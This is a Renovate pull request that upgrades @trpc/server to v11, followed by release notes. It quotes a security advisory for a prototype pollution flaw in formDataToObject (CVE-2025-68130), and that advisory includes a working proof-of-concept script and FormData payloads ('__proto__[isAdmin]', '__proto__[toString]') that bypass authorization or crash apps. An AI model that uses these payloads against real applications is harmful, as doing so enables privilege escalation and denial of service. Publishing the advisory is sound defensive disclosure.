chore(deps): update dependency trpcserver10 to v11 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
trpcserver10 (source)	^10.45.2 → ^11.8.0

GitHub Vulnerability Alerts

CVE-2025-68130

Note that this vulnerability is only present when using experimental_caller / experimental_nextAppDirCaller.

Summary

A Prototype Pollution vulnerability exists in @trpc/server's formDataToObject function, which is used by the Next.js App Router adapter. An attacker can pollute Object.prototype by submitting specially crafted FormData field names, potentially leading to authorization bypass, denial of service, or other security impacts.

Affected Versions

• Package: @trpc/server
• Affected Versions: >=10.27.0
• Vulnerable Component: formDataToObject() in src/unstable-core-do-not-import/http/formDataToObject.ts

Vulnerability Details

Root Cause

The set() function in formDataToObject.ts recursively processes FormData field names containing bracket/dot notation (e.g., user[name], user.address.city) to create nested objects. However, it does not validate or sanitize dangerous keys like __proto__, constructor, or prototype.

Vulnerable Code

// packages/server/src/unstable-core-do-not-import/http/formDataToObject.ts
function set(obj, path, value) {
  if (path.length > 1) {
    const newPath = [...path];
    const key = newPath.shift();  // ← No validation of dangerous keys
    const nextKey = newPath[0];

    if (!obj[key]) {  // ← Accesses obj["__proto__"] which returns Object.prototype
      obj[key] = isNumberString(nextKey) ? [] : {};
    }
    
    set(obj[key], newPath, value);  // ← Recursively pollutes Object.prototype
    return;
  }
  // ...
}

export function formDataToObject(formData) {
  const obj = {};
  for (const [key, value] of formData.entries()) {
    const parts = key.split(/[\.\[\]]/).filter(Boolean);  // Splits "__proto__[isAdmin]" → ["__proto__", "isAdmin"]
    set(obj, parts, value);
  }
  return obj;
}

Attack Vector

When a user submits a form to a tRPC mutation using Next.js Server Actions, the nextAppDirCaller adapter processes the FormData:

// packages/server/src/adapters/next-app-dir/nextAppDirCaller.ts:88-89
if (normalizeFormData && input instanceof FormData) {
  input = formDataToObject(input);  // ← Vulnerable call
}

An attacker can craft FormData with malicious field names:

const formData = new FormData();
formData.append("__proto__[isAdmin]", "true");
formData.append("__proto__[role]", "superadmin");

When processed, this pollutes Object.prototype:

{}.isAdmin        // → "true"
{}.role           // → "superadmin"

Proof of Concept

# Step 1: Create the project directory

mkdir trpc-vuln-poc
cd trpc-vuln-poc

# Step 2: Initialize npm

npm init -y

# Step 3: Install vulnerable tRPC

npm install @​trpc/[email protected]

# Step 4: Create the test file 

---

Test.js

const { formDataToObject } = require('@​trpc/server/unstable-core-do-not-import');

console.log("=== PoC Prototype Pollution en tRPC ===\n");

console.log("[1] Estado inicial:");
console.log("    {}.isAdmin =", {}.isAdmin);

const fd = new FormData();
fd.append("__proto__[isAdmin]", "true");
fd.append("__proto__[role]", "superadmin");
fd.append("username", "attacker");

console.log("\n[2] FormData malicioso:");
console.log('    __proto__[isAdmin] = "true"');
console.log('    __proto__[role] = "superadmin"');

console.log("\n[3] Llamando formDataToObject()...");
const result = formDataToObject(fd);
console.log("    Resultado:", JSON.stringify(result));

console.log("\n[4] Después del ataque:");
console.log("    {}.isAdmin =", {}.isAdmin);
console.log("    {}.role =", {}.role);

const user = { id: 1, name: "john" };
console.log("\n[5] Impacto en autorización:");
console.log("    Usuario normal:", JSON.stringify(user));
console.log("    user.isAdmin =", user.isAdmin);

if (user.isAdmin) {
    console.log("\n    VULNERABLE - Authorization bypass exitoso!");
} else {
    console.log("\n    ✓ Seguro");
}

Impact

Authorization Bypass (HIGH)

Many applications check user permissions using property access:

// Vulnerable pattern
if (user.isAdmin) {
  // Grant admin access
}

After pollution, all objects will have isAdmin: "true", bypassing authorization.

Denial of Service (MEDIUM)

Polluting commonly used property names can crash applications:

formData.append("__proto__[toString]", "not_a_function");
// All subsequent .toString() calls will fail

---

Release Notes

trpc/trpc (trpcserver10)

v11.8.0

Compare Source

What's Changed

• feat(server): support streaming in API Gateway REST API by @​anatolzak in #​7039

v11.7.2

Compare Source

What's Changed

• fix(server): missing sse options when using mergeRouter by @​timcole in #​7023

New Contributors

• @​KitsuneKode made their first contribution in #​6975
• @​timcole made their first contribution in #​7023

Full Changelog: trpc/trpc@v11.7.1...v11.7.2

v11.7.1

Compare Source

What's Changed

• fix(tanstack-react-query): keyPrefix of undefined by @​Nick-Lucas in #​6990

New Contributors

• @​theoludwig made their first contribution in #​6906

Full Changelog: trpc/trpc@v11.7.0...v11.7.1

v11.7.0

Compare Source

What's Changed

• fix(client): do not emit "connecting" when initializing websocket subscription by @​hmatthieu in #​6970
• fix(server): Export octet types by @​Nick-Lucas in #​6981
• feat(tanstack-react-query): Add QueryKey and MutationKey Prefix option by @​Nick-Lucas in #​6976

Full Changelog: trpc/trpc@v11.6.0...v11.7.0

v11.6.0

Compare Source

What's Changed

• feat: add precondition required response code by @​y-nk in #​6954
• fix(client): httpBatchStreamLink in React Native "stream ends with TypeError" by @​KATT in #​6960

New Contributors

• @​elrion018 made their first contribution in #​6932

Full Changelog: trpc/trpc@v11.5.1...v11.6.0

v11.5.1

Compare Source

What's Changed

• fix(server): fix property in JSDoc by @​jansepke in #​6928
• fix(server): export DataTransformer interface marked as public by @​BhaskarKulshrestha in #​6927
• fix(client): omit content type header in GET requests by @​anatolzak in #​6914

New Contributors

• @​jansepke made their first contribution in #​6928
• @​BhaskarKulshrestha made their first contribution in #​6927
• @​Strajk made their first contribution in #​6912
• @​cademis made their first contribution in #​6908
• @​iboughtbed made their first contribution in #​6886

Full Changelog: trpc/trpc@v11.5.0...v11.5.1

v11.5.0

Compare Source

What's Changed

• patch: prefer Standard Schema for input/output type inference by @​dzhu in #​6888
• feat(server): expose procedure path in resolver options by @​KATT in #​6902

New Contributors

• @​mrlubos made their first contribution in #​6880
• @​dzhu made their first contribution in #​6888
• @​cristijigau made their first contribution in #​6894

Full Changelog: trpc/trpc@v11.4.4...v11.5.0

v11.4.4

Compare Source

What's Changed

• patch: typescript 5.9 support by @​KATT in #​6877
• fix(client): httpBatchLink with custom transformed object at top level by @​KATT in #​6878
• fix: incompatible types in monorepo due to separate .d.ts for esm/cjs by @​KATT in #​6879

New Contributors

• @​ARAldhafeeri made their first contribution in #​6857
• @​ebg1223 made their first contribution in #​6851
• @​0xlakshan made their first contribution in #​6869

Full Changelog: trpc/trpc@v11.4.3...v11.4.4

v11.4.3

Compare Source

What's Changed

• fix(server): missing export from internal package by @​goszczynskip in #​6838
• fix(server): fix MaxListenersExceededWarning when socket is reused in fastify adapter by @​KATT in #​6842

New Contributors

• @​goszczynskip made their first contribution in #​6838

Full Changelog: trpc/trpc@v11.4.2...v11.4.3

v11.4.2

Compare Source

What's Changed

• fix: set target to ensure we support React Native by @​juliusmarminge in #​6826

Full Changelog: trpc/trpc@v11.4.1...v11.4.2

v11.4.1

Compare Source

What's Changed

• fix: correct order in exports condition by @​juliusmarminge in #​6822

Full Changelog: trpc/trpc@v11.4.0...v11.4.1

v11.4.0

Compare Source

What's Changed

• chore: bump turbo by @​KATT in #​6818
• Update wsLink.md (documentation) by @​hmatthieu in #​6813
• refactor: swap rollup with native rolldown (using tsdown) by @​juliusmarminge in #​6789
• chore: subtree should use canary-tag, not next by @​KATT in #​6816
• patch(client): upgrade localLink from experimental -> unstable by @​KATT in #​6817
• chore(www): fix link by @​bene in #​6820

New Contributors

• @​bene made their first contribution in #​6820

Full Changelog: trpc/trpc@v11.3.1...v11.4.0

v11.3.1

Compare Source

What's Changed

• fix(client): inference fix when serializing of json-like return types like z.json() by @​KATT in #​6810

Full Changelog: trpc/trpc@v11.3.0...v11.3.1

v11.3.0

Compare Source

What's Changed

• feat(client): add localLink by @​KATT in (https://trpc.io/docs/client/links/localLink) #​6806
• fix(react-query + tanstack-react-query): bump tanstack packages and peer dependencies by @​KATT in #​6809

New Contributors

• @​jackall3n made their first contribution in #​6805
• @​monsieursam made their first contribution in #​6801

Full Changelog: trpc/trpc@v11.2.0...v11.3.0

v11.2.0

Compare Source

What's Changed

• feat(server): support lambda response streaming by @​zirkelc in #​6680
• feat(server): add support for 402 http response status code by @​alonzuman in #​6796
• fix(tanstack-react-query): useSubscription calls onConnectionStateChange by @​darkobits in #​6797

New Contributors

• @​zirkelc made their first contribution in #​6680
• @​alonzuman made their first contribution in #​6796
• @​darkobits made their first contribution in #​6797

Full Changelog: trpc/trpc@v11.1.4...v11.2.0

v11.1.4

Compare Source

What's Changed

• fix(tanstack-react-query): skip inferring initialData by @​KATT in #​6793

Full Changelog: trpc/trpc@v11.1.3...v11.1.4

v11.1.3

Compare Source

What's Changed

• fix(client): sseStreamConsumer to use instance's properties instead of global by @​goknsh in #​6689
• fix(server): expose meta on procedures by @​Nick-Lucas in #​6767
• refactor(server): simplify error creation from unknown causes by @​braden-w in #​6778
• fix(client): Websocket not reconnecting when lazy is enabled by @​bnussman in #​6640
• fix(tanstack-react-quey): Ensure TRPC Tanstack React Query receives raw values from Vue ref inputs in Vue Query by @​levirs565 in #​6776
• fix(server): node 24 async iterables are already AsyncDisposables by @​KATT in #​6787

New Contributors

• @​tresorama made their first contribution in #​6732
• @​goknsh made their first contribution in #​6689
• @​escwxyz made their first contribution in #​6762
• @​braden-w made their first contribution in #​6778
• @​cibelius made their first contribution in #​6782
• @​catvec made their first contribution in #​6781
• @​rtrampox made their first contribution in #​6688
• @​nisabmohd made their first contribution in #​6702
• @​levirs565 made their first contribution in #​6776

Full Changelog: trpc/trpc@v11.1.2...v11.1.3

v11.1.2

Compare Source

What's Changed

• fix(tanstack-react-query): tanstack react query and fix type errors by @​Nick-Lucas in #​6707

New Contributors

• @​paulopontovaz made their first contribution in #​6725

Full Changelog: trpc/trpc@v11.1.1...v11.1.2

v11.1.1

Compare Source

v11.1.0

Compare Source

What's Changed

• feat(client): add retryDelayMs-option to retryLink by @​rynobax & @​KATT in #​6694

New Contributors

• @​rynobax made their first contribution in #​6694

Full Changelog: trpc/trpc@v11.0.4...v11.1.0

v11.0.4

Compare Source

What's Changed

• fix(client): TRPCConnectionState generic fixes by @​KATT in #​6684
• fix(client): keep deprecated unstable_-prefixes for links by @​KATT in #​6686

Full Changelog: trpc/trpc@v11.0.3...v11.0.4

v11.0.3

Compare Source

What's Changed

• chore: react 19.1 by @​juliusmarminge in #​6666
• fix(next): loosen up next.js peer dep range by @​juliusmarminge in #​6665
• fix(deps): update dependency next to v15.2.4 [security] by @​renovate in #​6667
• fix(deps): update dependency next to v15.2.4 [security] by @​renovate in #​6671
• chore(deps): update dependency @​types/node to v20.17.30 by @​renovate in #​6668
• fix(deps): update dependency vite to v6.2.5 [security] by @​renovate in #​6674
• fix(deps): update dependency effect to v3.14.6 by @​renovate in #​6672
• fix(deps): update dependency next to v15.2.4 [security] by @​renovate in #​6678
• fix(deps): update dependency next to v15.2.4 [security] by @​renovate in #​6679
• Align index number with text for smaller devices by @​breeworks in #​6639
• fix(deps): update dependency @​clack/prompts to v0.10.1 by @​renovate in #​6683

New Contributors

• @​breeworks made their first contribution in #​6639

Full Changelog: trpc/trpc@v11.0.2...v11.0.3

v11.0.2

Compare Source

What's Changed

• more validators.md udpates by @​mmkal in #​6638
• fix(deps): update dependency vite to v6.2.4 [security] by @​renovate in #​6651
• fix(deps): update dependency next to v15.2.4 [security] by @​renovate in #​6662
• fix(deps): update dependency next to v15.2.4 [security] by @​renovate in #​6663
• Make opts optional in trpcSubscriptionOptions. by @​yspreen in #​6661
• @​trpc/upgrade: Fix error when running git check-ignore with 0 ignored files by @​spookyuser in #​6654

New Contributors

• @​yspreen made their first contribution in #​6661
• @​spookyuser made their first contribution in #​6654

Full Changelog: trpc/trpc@v11.0.1...v11.0.2

v11.0.1

Compare Source

What's Changed

• docs(example): Contribute trpc-fastify as example boilerplate code by @​cobeo2004 in #​6615
• chore(examples): Add Nuxt minimal example by @​wobsoriano in #​6629
• fix: recognize effect standard-schema parsers 3.14.2 by @​mmkal in #​6634

New Contributors

• @​michalbundyra made their first contribution in #​6627

Full Changelog: trpc/trpc@v11.0.0...v11.0.1

v11.0.0

Compare Source

👉 See the blog post @​ https://trpc.io/blog/announcing-trpc-11

---

What's Changed

Full Changelog: trpc/trpc@v10.45.0...v11.0.0

v10.45.4

Compare Source

• Fixes broken package.json file (#​7078)

Full Changelog: trpc/trpc@v10.45.3...v10.45.4

v10.45.3

Compare Source

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

Branch automerge failure

This PR was configured for branch automerge. However, this is not possible, so it has been raised as a PR instead.

---

• Branch has one or more failed status checks

[pkg-pr-new]

Open in StackBlitz

npm i https://pkg.pr.new/mmkal/trpc-cli@167

commit: e432da8